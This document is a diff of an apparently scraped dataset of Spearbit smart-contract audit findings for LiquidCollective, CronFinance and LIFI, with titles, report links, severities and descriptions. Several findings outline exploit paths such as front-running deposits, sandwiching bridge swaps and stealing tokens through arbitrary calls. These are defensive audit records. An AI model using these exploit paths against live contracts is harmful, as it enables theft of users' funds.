Related: OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator , OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys) , _hasFundableKeys marks operators that have no more fundable validators as fundable.", + "title": "Unsupported SwapKind.GIVEN_OUT may limit the compatibility with Balancer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The Balancer protocol utilizes two types of swaps for its functionality - GIVEN_IN and GIVEN_OUT. GIVEN_IN specifies the minimum amount of tokens a user would accept to receive from the swap. GIVEN_OUT specifies the maximum amount of tokens a user would accept to send for the swap. However, the onSwap function of the CronV1Pool contract only accepts the IVault.SwapKind.GIVEN_IN value as the IVault.SwapKind field of the SwapRequest struct. The unsupported SwapKind.GIVEN_OUT may limit the compatibility with Balancer on the Batch Swaps and the Smart Order Router functionality, as a single SwapKind is given as an argument.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "Dust might be trapped in WlsETH when burning one's balance.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "It is not possible to burn the exact amount of minted/deposited lsETH back because of the _value provided to burn is in ETH. Assume we've called mint(r,v) with our address r, then to get the v lsETH back to our address, we need to find an x where v = bx S B c and call burn(r, x) (Here S represents the total share of lsETH and B the total underlying value.). It's not always possible to find the exact x. So there will always be an amount locked in this contract ( v (cid:0) bx S B c ). These dust amounts can accumulate from different users and turn into a big number. To get the full amount back, the user needs to mint more wlsETH tokens so that we can find an exact solution to v = bx S B c. The extra amount to get the locked-up fees back can be engineered. The same problem exists for transfer and transferFrom. Also note, if you have minted x amount of shares, the balanceOf would tell you that you own b = b xB S c wlsETH. Internally wlsETH keeps track of the shares x. So users think they can only burn b amount, plug that in for the _value and in this case, the number of shares burnt would be b xB S cS B % $ which has even more rounding errors. wlsETH could internally track the underlying but that would not appropriate value like lsETH, which would basically be kind of wETH. We think the issue of not being able to transfer your full amount of shares is not as serious as not being able to burn back your shares into lsETH. On the same note, we think it would be beneficial to expose the wlsETH share amount to the end user: function sharesBalanceOf(address _owner) external view returns (uint256 shares) { return BalanceOf.get(_owner); }", + "title": "A pool's first LP will always take a minor loss on the value of their liquidity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The first liquidity provider for a pool will always take a small loss on the value of their tokens deposited into the pool because 1000 balancer pool tokens are minted to the zero address on the initial deposit. As most tokens have 18 decimal places, this value would be negligible in most cases, however, for tokens with a high value and small decimals the effects may be more apparent.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "BytesLib.concat can potentailly return results with dirty byte paddings.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "concat does not clean the potential dirty bytes that might have been copied from _postBytes (nor does it clean the padding). The dirty bytes from _postBytes are carried over to the padding for tempBytes.", + "title": "The _withdrawCronFees functions should revert if no fees to withdraw", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The _withdrawCronFees checks if there are any Cron Fees that need to be withdrawn, currently, this function does not revert in case there are no fees.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "The reportBeacon is prone to front-running attacks by oracle members", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "There could be a situation where the oracle members are segmented into 2 groups A and B , and members of the group A have voted for the report variant Va and the group B for Vb . Also, let's assume these two variants are 1 vote short of quorum. Then either group can try to front-run the other to push their submitted variant to river.", + "title": "Schedule amounts cannot be revoked or released", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "The migration for schedule ids 9 to 12 has the following parameters: // 9 -> 12 migrations[3] = VestingScheduleMigration({ scheduleCount: 4, newStart: 0, newEnd: 1656626400, newLockDuration: 72403200, setCliff: true, setDuration: true, setPeriodDuration: true, ignoreGlobalUnlock: false }); The current start is 7/1/2022 0:00:00 and the updated/migrated end value would be 6/30/2022 22:00:00, this will cause _computeVestedAmount(...) to always return 0 where one is calculating the released amount due to capping the time by the end timestamp. And thus tokens would not be able to be released. Also these tokens cannot be revoked since the set [start, end] where end < start would be empty.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Low Risk" ] }, { - "title": "Shares distributed to operators suffer from rounding error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "_rewardOperators distribute a portion of the overall shares distributed to operators based on the number of active and funded validators that each operator has. The current number of shares distributed to a validator is calculated by the following code _mintRawShares(operators[idx].feeRecipient, validatorCounts[idx] * rewardsPerActiveValidator); where rewardsPerActiveValidator is calculated as uint256 rewardsPerActiveValidator = _reward / totalActiveValidators; This means that in reality each operator receives validatorCounts[idx] * (_reward / totalActiveValida- tors) shares. Such share calculation suffers from a rounding error caused by division before multiplication.", + "title": "A revoked schedule might be able to be fully released before the 2 year global lock period", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "The unlockedAmount calculated in _computeGlobalUnlocked(...) is based on the original sched- uledAmount. If a creator revokes its revocable vesting schedule and change the end time to a new earlier date, this formula does not use the new effective amount (the total vested amount at the new end date). And so one might be able to release the vested tokens before 2 years after the lock period.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Low Risk" ] }, { - "title": "OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Note that limited number of validators (already pushed by op) that have been approved by Alluvial and can be selected to be funded. funded number of validators funded. stopped number of validators exited (so that were funded at some point but for any reason they have exited the staking). The implementation of the function should favor operators that have the highest number of available validators to be funded. Nevertheless functions favor validators that have stopped value near the funded value. Consider the following example: Op at index 0 name op1 active true limit 10 funded 5 stopped 5 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 1) op1 and op2 have 10 validators whitelisted. 2) op1 at time1 get 5 validators funded. 3) op1 at time2 get those 5 validators exited, this mean that op.stopped == 5. In this scenario, those 5 validators would not be used because they are \"blacklisted\". At this point op1 have 5 validators that can be funded. 24 op2 have 10 validators that can be funded. pickNextValidators logic should favor operators that have the higher number of available keys (not funded but approved) to be funded. If we run operatorsRegistry.pickNextValidators(5); the result is this Op at index 0 name op1 active true limit 10 funded 10 stopped 5 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 Op1 gets all the remaining 5 validators funded, the function (from the specification of the logic) should instead have picked Op2. Check the Appendix for a test case to reproduce this issue.", + "title": "Unlock date of certain vesting schedules does not meet the requirement", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "All vesting schedules should have the unlock date (start + lockDuration) set to 16/10/2024 0:00 GMT+0 post-migration. The following is the list of vesting schedules whose unlock date does not meet the requirement post-migration: Index Unlock Date 19,21,23 16/10/2024 9:00 GMT+0 36-60 16/10/2024 22:00 GMT+0", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Low Risk" ] }, { - "title": "approve() function can be front-ran resulting in token theft", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The approve() function has a known race condition that can lead to token theft. If a user calls the approve function a second time on a spender that was already allowed, the spender can front-run the transaction and call transferFrom() to transfer the previous value and still receive the authorization to transfer the new value.", + "title": "ERC20VestableVotesUpgradeableV1._computeVestingReleasableAmount: Users VestingSchedule.releasedAmount > globalUnlocked will be temporarily denied of service with", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "The current version of the code introduces a new concept; global unlocking. The idea is that wher- ever IgnoreGlobalUnlockSchedule is set to false, the releasable amount will be the minimum value between the original vesting schedule releasable amount and the global unlocking releasable amount (the constant rate of VestingSchedule.amount / 24 for each month starting at the end of the locking period). The implementa- tion ,however, consists of an accounting error caused by a wrong implicit assumption that during the execution of _computeVestingReleasableAmount globalUnlocked should not be less than releasedAmount. In reality, how- In that case globalUnlocked - ever, this state is possible for users that had already claimed vested tokens. releasedAmount will revert for an underflow causing a delay in the vesting schedule which in the worst case may last for two years. Originally this issue was meant to be classified as medium risk but since the team stated that with the current deployment, no tokens will be released whatsoever until the upcoming upgrade of the TLC contract, we decided to classify this issue as low risk instead.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Low Risk" ] }, { - "title": "Add missing input validation on constructor/initializer/setters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Allowlist.1.sol initAllowlistV1 should require the _admin parameter to be not equal to address(0). This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. allow should check _accounts[i] to be not equal to address(0). Firewall.sol constructor should check that: governor_ != address(0). executor_ != address(0). destination_ != address(0). setGovernor should check that newGovernor != address(0). setExecutor should check that newExecutor != address(0). OperatorsRegistry.1.sol initOperatorsRegistryV1 should require the _admin parameter to be not equal to address(0). This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. addOperator should check: _name to not be an empty string. _operator to not be address(0). _feeRecipi- ent to not be address(0). setOperatorAddress should check that _newOperatorAddress is not address(0). setOperatorFeeRecipientAddress should check that _newOperatorFeeRecipientAddress is not address(0). setOperatorName should check that _newName is not an empty string. Oracle.1.sol initOracleV1 should require the _admin parameter to be not equal to address(0). This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. Consider also adding some min and max limit to the values of _annualAprUpperBound and _relativeLowerBound and be sure that _epochsPerFrame, _slotsPerEpoch, _secondsPerSlot and _genesisTime matches the values expected. addMember should check that _newOracleMember is not address(0). setBeaconBounds: Consider adding min/max value that _annualAprUpperBound and _relativeLowerBound should respect. River.1.sol initRiverV1: _globalFee should follow the same validation done in setGlobalFee. Note that client said that 0 is a valid _- globalFee value \"The revenue redistributuon would be computed off-chain and paid by the treasury in that case. It's still an on-going discussion they're having at Alluvial.\" _operatorRewardsShare should follow the same validation done in setOperatorRewardsShare. Note that client said that 0 is a valid _operatorRewardsShare value \"The revenue redistributuon would be computed off-chain and paid by the treasury in that case. It's still an on-going discussion they're having at Alluvial.\" ConsensusLayerDepositManager.1.sol initConsensusLayerDepositManagerV1: _withdrawalCredentials should not be empty and follow the re- quirements expressed in the following official Consensus Specs document. 26", + "title": "TlcMigration.migrate: Missing input validation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "The upcoming change in some of the vesting schedules is going to be executed via the migrate function which at the current version of the code is missing necessary validation checks to make sure no erroneous values are inserted.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Low Risk" ] }, { - "title": "LibOwnable._setAdmin allows setting address(0) as the admin of the contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "While other contracts like RiverAddress (for example) do not allow address(0) to be used as set input parameter, there is no similar check inside LibOwnable._setAdmin. Because of this, contracts that call LibOwnable._setAdmin with address(0) will not revert and functions that should be callable by an admin cannot be called anymore. This is the list of contracts that import and use the LibOwnable library AllowlistV1 OperatorsRegistryV1 OracleV1 RiverV1", + "title": "Optimise the release amount calculation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "In the presence of a global lock schedule one calculates the release amount as: LibUint256.min(vestedAmount - releasedAmount, globalUnlocked - releasedAmount)", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Gas Optimization" ] }, { - "title": "OracleV1.getMemberReportStatus returns true for non existing oracles", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "memberIndex will be equal to -1 for non-existing oracles, which will cause the mask to be equal to 0, which will cause the function to return true for non-existing oracles.", + "title": "Use msg.sender whenever possible", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "checked to be equal to msg.sender: In this context the parameters vestingSchedule.{creator, beneficiary} have already been if (msg.sender != vestingSchedule.X) { revert LibErrors.Unauthorized(msg.sender); }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Gas Optimization" ] }, { - "title": "Operators might add the same validator more than once", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Operators can use OperatorsRegistryV1.addValidators to add the same validator more than once. Depositors' funds will be directed to these duplicated addresses, which in turn, will end up having more than 32 eth. This act will damage the capital efficiency of the entire deposit pool and thus will potentially impact the pool's APY.", + "title": "Test function testMigrate uses outdated values for assertion", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "In commit fbcc4ddd6da325d60eda113c2b0e910aa8492b88, the newLockDuration values were up- dated in TLC_globalUnlockScheduleMigration.sol. However, the testMigrate function was not updated ac- cordingly and still compares schedule.lockDuration to the outdated newLockDuration values, resulting in failing assertions.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Informational" ] }, { - "title": "OracleManager.setBeaconData possible front running attacks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The system is designed in a way that depositors receive shares (lsETH) in return for their eth de- posit. A share represents a fraction of the total eth balance of the system in a given time. Investors can claim their staking profits by withdrawing once withdrawals are active in the system. Profits are being pulled from ELFeeRe- cipient to the River contract when the oracle is calling OracleManager.setBeaconData. setBeaconData updates BeaconValidatorBalanceSum which might be increased or decreased (as a result of slashing for instance). Investors have the ability to time their position in two main ways: Investors might time their deposit just before profits are being distributed, thus harvesting profits made by others. Investors might time their withdrawal / sell lsETH on secondary markets just before the loss is realized. By doing this, they will effectively avoid the loss, escaping the intended mechanism of socializing losses.", + "title": "Rounding Error in Unlocked Token Amount Calculation at ERC20VestableVotesUpgradea- ble.1.sol#L458", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "There is a rounding error in calculating the unlocked amount, which may lead to minor discrepancies in the tokens available for release.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Informational" ] }, { - "title": "SharesManager._mintShares - Depositors may receive zero shares due to front-running", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The number of shares minted to a depositor is determined by (_underlyingAssetValue * _total- Supply()) / oldTotalAssetBalance. Potential attackers can spot a call to UserDepositManagerV1._deposit and front-run it with a transaction that sends wei to the contract (by self-destructing another contract and sending the funds to it), causing the victim to receive fewer shares than what he expected. More specifically, In case old- TotalAssetBalance() is greater than _underlyingAssetValue * _totalSupply(), then the number of shares the depositor receives will be 0, although _underlyingAssetValue will be still pulled from the depositors balance. An attacker with access to enough liquidity and to the mem-pool data can spot a call to UserDepositManagerV1._- deposit and front-run it by sending at least totalSupplyBefore * (_underlyingAssetValue - 1) + 1 wei to the contract . This way, the victim will get 0 shares, but _underlyingAssetValue will still be pulled from its account balance. In this case, the attacker does not necessarily have to be a whitelisted user, and it is important to mention that the funds that were sent by him can not be directly claimed back, rather, they will increase the price of the share. The attack vector mentioned above is the general front runner case, the most profitable attack vector will be the case where the attacker is able to determine the share price (for instance if the attacker mints the first share). In this scenario, the attacker will need to send at least attackerShares * (_underlyingAssetValue - 1) + 1 to the contract, (attackerShares is completely controlled by the attacker, and thus can be 1). In our case, depositors are whitelisted, which makes this attack harder for a foreign attacker.", + "title": "It might take longer than 2 years to release all the vested schedule amount after the lock period ends", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "It is possible that in the presence of the global lock, releasing the total vested value might take longer than 2 years if the lockDuration + 2 years is comparatively small when compared to duration (or start - end). We just know that after 2 years all the scheduled amount can be released but only a portion of it might have been vested.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Informational" ] }, { - "title": "Orphaned (index, values) in SlotOperator storage slots in operatorsRegistry", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "If !opExists corresponds to an operator which has OperatorResolution.active set to false, the line below can leave some orphaned (index, values) in SlotOperator storage slots: _setOperatorIndex(name, newValue.active, r.value.length - 1);", + "title": "_computeVestingReleasableAmount's_time input parameter can be removed/inlined", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "At both call sites to _computeVestingReleasableAmount(...), time is _getCurrentTime().", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Low Risk" + "LiquidCollectivePR", + "Severity: Informational" ] }, { - "title": "OperatorsRegistry.setOperatorName Possible front running attacks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "1. setOperatorName reverts for an already used name, which means that a call to setOperatorName might be front-ran using the same name. The front-runner can launch the same attack again and again thus causing a DoS for the original caller. 2. setOperatorName can be called either by an operator (to edit his own name) or by the admin. setOpera- torName will revert for an already used _newName. setOperatorName caller might be front-ran by the identical transaction transmitted by someone else, which will lead to failure for his transaction, where in practice this failure is a \"false failure\" since the desired change was already made.", + "title": "Hardcode bridge addresses via immutable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Most bridge facets call bridge contracts where the bridge address has been supplied as a parameter. This is inherently unsafe because any address could be called. Luckily, the called function signature is hardcoded, which reduces risk. However, it is still possible to call an unexpected function due to the potential collisions of function signatures. Users might be tricked into signing a transaction for the LiFi protocol that calls unexpected contracts. One exception is the AxelarFacet which sets the bridge addresses in initAxelar(), however this is relatively expensive as it requires an SLOAD to retrieve the bridge addresses. Note: also see \"Facets approve arbitrary addresses for ERC20 tokens\". function startBridgeTokensViaOmniBridge(..., BridgeData calldata _bridgeData) ... { ... _startBridge(_lifiData, _bridgeData, _bridgeData.amount, false); } function _startBridge(..., BridgeData calldata _bridgeData, ...) ... { IOmniBridge bridge = IOmniBridge(_bridgeData.bridge); if (LibAsset.isNativeAsset(_bridgeData.assetId)) { bridge.wrapAndRelayTokens{ ... }(...); } else { ... bridge.relayTokens(...); } ... } contract AxelarFacet { function initAxelar(address _gateway, address _gasReceiver) external { ... s.gateway = IAxelarGateway(_gateway); s.gasReceiver = IAxelarGasService(_gasReceiver); } function executeCallViaAxelar(...) ... { ... s.gasReceiver.payNativeGasForContractCall{ ... }(...); s.gateway.callContract(destinationChain, destinationAddress, payload); } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Low" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Prevent users from burning token via lsETH/wlsETH transfer or transferFrom functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of both lsETH (SharesManager component of River contract) and wlsETH allow the user to \"burn\" tokens, sending them directly to the address(0) via the transfer and transferFrom function. By doing that, it would bypass the logic of the existing burn functions present right now (or in the future when withdrawals will be enabled in River) in the protocol.", + "title": "Tokens are left in the protocol when the swap at the destination chain fails", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "LiFi protocol finds the best bridge route for users. In some cases, it helps users do a swap at the destination chain. With the help of the bridge protocols, LiFi protocol helps users trigger swapAndComplete- BridgeTokensVia{Services} or CompleteBridgeTokensVia{Services} at the destination chain to do the swap. Some bridge services will send the tokens directly to the receiver address when the execution fails. For example, Stargate, Amarok and NXTP do the external call in a try-catch clause and send the tokens directly to the receiver If the receiver is the Executor contract, when it fails. The tokens will stay in the LiFi protocols in this scenario. users can freely pull the tokens. Note: Exploiters can pull the tokens from LiFi protocol, Please refer to the issue Remaining tokens can be sweeped from the LiFi Diamond or the Executor , Issue #82 Exploiters can take a more aggressive strategy and force the victims swap to revert. A possible exploit scenario: A victim wants to swap 10K optimisms BTC into Ethereum mainnet USDC. Since dexs on mainnet have the best liquidity, LiFi protocol helps users to the swap on mainnet The transaction on the source chain (optimism) suceed and the Bridge services try to call Complete- BridgeTokensVia{Services} on mainnet. The exploiter builds a sandwich attack to pump the BTC price. The CompleteBridgeTokens fails since the price is bad. The bridge service does not revert the whole transaction. Instead, it sends the BTC on the mainnet to the receiver (LiFi protocol). The exploiter pulls tokens from the LiFi protocol.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Low Risk" + "LIFI", + "Severity: High Risk" ] }, { - "title": "In addOperator when emitting an event use stack variables instead of reading from memory again", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In OperatorsRegistry's addOperator function when emitting the AddedOperator event we read from memory all the event parameters except operatorIndex. emit AddedOperator(operatorIndex, newOperator.name, newOperator.operator, newOperator.feeRecipient); We can avoid reading from memory to save gas.", + "title": "Tokens transferred with Axelar can get lost if the destination transaction cant be executed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "If _executeWithToken() reverts then the transaction can be retried, possibly with additional gas. See axelar recovery. However there is no option to return the tokens or send them elsewhere. This means that tokens would be lost if the call cannot be made to work. contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeWithToken(...) ... { ... (bool success, ) = callTo.call(callData); if (!success) revert ExecutionFailed(); } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Rewrite pad64 so that it doesn't use BytesLib.concat and BytesLib.slice to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "We can avoid using the BytesLib.concat and BytesLib.slice and write pad64 mostly in assembly. Since the current implementation adds more memory expansion than needed (also not highly optimized).", + "title": "Use the getStorage() / NAMESPACE pattern instead of global variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The facet DexManagerFacet and the inherited contracts Swapper.sol / SwapperV2.sol define a global variable appStorage on the first storage slot. These two overlap, which in this case is intentional. However it is dangerous to use this construction in a Diamond contract as this uses delegatecall. If any other contract uses a global variable it will overlap with appStorage with unpredictable results. This is especially impor- tant because it involves access control. For example if the contract IAxelarExecutable.sol were to be inherited in a facet, then its global variable gateway would overlap. Luckily this is currently not the case. contract DexManagerFacet { ... LibStorage internal appStorage; ... } contract Swapper is ILiFi { ... LibStorage internal appStorage; // overlaps with DexManagerFacet which is intentional ... }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Cache r.value.length used in a loop condition to avoid reading from the storage multiple times.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In a loop like the one below, consider caching r.value.length value to avoid reading from storage on every round of the loop. for (uint256 idx = 0; idx < r.value.length;) {", + "title": "Decrease allowance when it is already set a non-zero value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Non-standard tokens like USDT will revert the transaction when a contract or a user tries to approve an allowance when the spender allowance is already set to a non zero value. For that reason, the previous allowance should be decreased before increasing allowance in the related function. Performing a direct overwrite of the value in the allowances mapping is susceptible to front-running scenarios by an attacker (e.g., an approved spender). As an Openzeppelin mentioned, safeApprove should only be called when setting an initial allowance or when resetting it to zero. 9 function safeApprove( IERC20 token, address spender, uint256 value ) internal { // safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), \"SafeERC20: approve from non-zero to non-zero allowance\" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value)); } There are four instance of this issue: AxelarFacet.sol is directly using approve function which does not check return value of an external function. The faucet should utilize LibAsset.maxApproveERC20() function like the other faucets. LibAsset s LibAsset.maxApproveERC20() function is used on the other faucets. For instance, USDTs ap- proval mechanism reverts if current allowance is nonzero. From that reason, the function can approve with zero first or safeIncreaseAllowance can be utilized. FusePoolZap.sol is also using approve function which does not check return value . The contract does not import any other libraries, that being the case, the contract should use safeApprove function with approving zero. Executor.sol is directly using approve function which does not check return value of an external function. The contract should utilize LibAsset.maxApproveERC20() function like the other contracts.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Rewrite the for loop in ValidatorKeys.sol::getKeys to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "", + "title": "Too generic calls in GenericBridgeFacet allow stealing of tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "With the contract GenericBridgeFacet, the functions swapAndStartBridgeTokensGeneric() (via LibSwap.swap()) and _startBridge() allow arbitrary functions calls, which allow anyone to call transferFrom() and steal tokens from anyone who has given a large allowance to the LiFi protocol. This has been used to hack LiFi in the past. The followings risks also are present: call the Lifi Diamand itself via functions that dont have nonReentrant. perhaps cancel transfers of other users. call functions that are protected by a check on this, like completeBridgeTokensViaStargate. 10 contract GenericBridgeFacet is ILiFi, ReentrancyGuard { function swapAndStartBridgeTokensGeneric( ... LibSwap.swap(_lifiData.transactionId, _swapData[i]); ... } function _startBridge(BridgeData memory _bridgeData) internal { ... (bool success, bytes memory res) = _bridgeData.callTo.call{ value: value ,! }(_bridgeData.callData); ... } } library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { ... (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue ,! }(_swapData.callData); ... } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Operators.get in _getNextValidatorsFromActiveOperators can be replaced by Opera- tors.getByIndex to avoid extra operations/gas.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Operators.get in _getNextValidatorsFromActiveOperators performs multiple checks that have been done before when Operators.getAllFundable() was called. This includes finding the index, and checking if OperatorResolution.active is set. These are all not necessary.", + "title": "LiFi protocol isnt hardened", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The usage of the LiFi protocol depends largely on off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs and doesnt verify them. Several elements are not connected via smart contracts but via the API, for example: the emits of LiFiTransferStarted versus the bridge transactions. the fees paid to the FeeCollector versus the bridge transactions. the Periphery contracts as defined in the PeripheryRegistryFacet versus the rest. In case the API and or frontend contain errors or are hacked then tokens could be easily lost. Also, when calling the LiFi contracts directly or via other smart contracts, it is rather trivial to commit mistakes and loose tokens. Emit data can be easily disturbed by malicious actors, making it unusable. The payment of fees can be easily circumvented by accessing the contracts directly. It is easy to make fake websites which trick users into signing transactions which seem to be for LiFi but result in loosing tokens. With the current design, the power of smart contracts isnt used and it introduces numerous risks as described in the rest of this report.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Avoid unnecessary equality checks with true in if statements", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Statements of the type if( condition == true) can be replaced with if(condition). The extra comparison with true is redundant.", + "title": "Bridge with Axelar can be stolen with malicious external call", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Executor contract allows users to build an arbitrary payload external call to any address except address(erc20Proxy). erc20Proxy is not the only dangerous address to call. By building a malicious external call to Axelar gateway, exploiters can steal users funds. The Executor does swaps at the destination chain. By setting the receiver address to the Executor contract at the destination chain, Li-Fi can help users to get the best price. Executor inherits IAxelarExecutable. execute and executeWithToken validates the payload and executes the external call. IAxelarExecutable.sol#L27-L40 function executeWithToken( bytes32 commandId, string 